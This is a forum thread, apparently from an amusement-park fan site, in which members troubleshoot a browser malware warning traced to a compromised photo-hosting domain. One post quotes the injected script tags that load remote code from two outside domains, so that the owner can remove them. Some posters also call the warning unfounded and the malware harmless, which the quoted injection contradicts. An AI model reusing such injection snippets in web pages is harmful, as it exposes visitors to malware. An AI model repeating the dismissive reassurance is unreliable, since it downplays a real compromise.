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Got the message below when clicking on the Soak City construction topic.

www.KICentral.com contains content from www.mcflash.4000loavesanhour.com, a site known to distribute malware. Your computer might catch a virus if you visit this site.

Google has found malicious software may be installed onto your computer if you proceed. If you've visited this site in the past or you trust this site, it's possible that it has just recently been compromised by a hacker. You should not proceed, and perhaps try again tomorrow or go somewhere else.

We have already notified www.mcflash.4000loavesanhour.com that we found malware on the site. For more about the problems found on www.mcflash.4000loavesanhour.com, visit the Google

Safe Browsing diagnostic page.

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Gordon needs to edit the index page that "www.mcflash.4000loavesanhour.com" points to, and remove the code that someone put on that page (and most likely, change the permissions on the website [such as chmod 644]).

In case Gordon sees this, this is what needs removed:

<script src="[url="view-source:http://sweepstakesandcontestsnow.com/nl.php?nnn=1"]http://sweepstakesandcontestsnow.com/nl.php?nnn=1[/url]"></script>\n<script src="[url="view-source:http://globalpoweringgathering.com/nl.php?p=1"]http://globalpoweringgathering.com/nl.php?p=1[/url]"></script>\n<

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It's because Gordon Bombay posted some of his photos in it. Chrome's got unfounded beef with his website (where his photos are stored.) Don't worry, it's safe.

Firefox does the same thing for me.

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Hendrick, thank you!

I have been having that problem with that malware message for nearly a darn year. The domain mcflash.4000 etc. isn't actually mine. It's owned by a friend who I do some photo work with. He wasn't able to fix the problem, I asked countless places for help and no one seemed to have a solution. I've currently been ripping EVERY photo off the blog and re-catologing them to put on Flickr. After that I'd have to go through every blog post and fix the HTML img sources.

Hopefully, I can get that code off of there. Should I just pull that index page into dreamweaver and fix it?

To everyone else:

I sincerely apologize for the malware message. I promise you, it's harmless. For me, it doesn't show up in Firefox, Safari or Chrome. Lately, less people have been getting it, but I guess it's still coming up. Hopefully Hendrick's method works out.

Hendrick, you're the dude!

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No problem Gordon. Dreamweaver will work great (I like it for HTML), but since your simply removing code, even notepad would work. Make sure you do chmod the index file though to 644 to hopefully prevent this from happening (assuming all of your other files have the correct permissions.)

I figured the problem had to be on the "www.mcflash.4000loavesanhour.com" domain, and since it seems that every other one of your pages is on Blogspot, was pretty easy to find. Once you get it removed, visit this page, and at the bottom, it appears you can ask Google to re-visit the page.

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Asking Google right now. I went ahead and just deleted that entire index page. It was only a splash page anyways and I took the QC/D domain name and re-directed it straight to the blog a few years back anyways. I'm gonna upload a new index page that just has a simple message.

Anyone still getting warnings?

Posted

Same message is poping up again. I think what happened was your accidentially had the wrong index up a few days ago, and that's probably when Google checked it. Everything seems okay now, so you might want to re-submit it again.

Posted

I still get the message if I navigate the site. What generally happens is the first 2-3 stories are fine, and if I go into the history like 2007 or whatnot, that message comes up again. I still use chrome.

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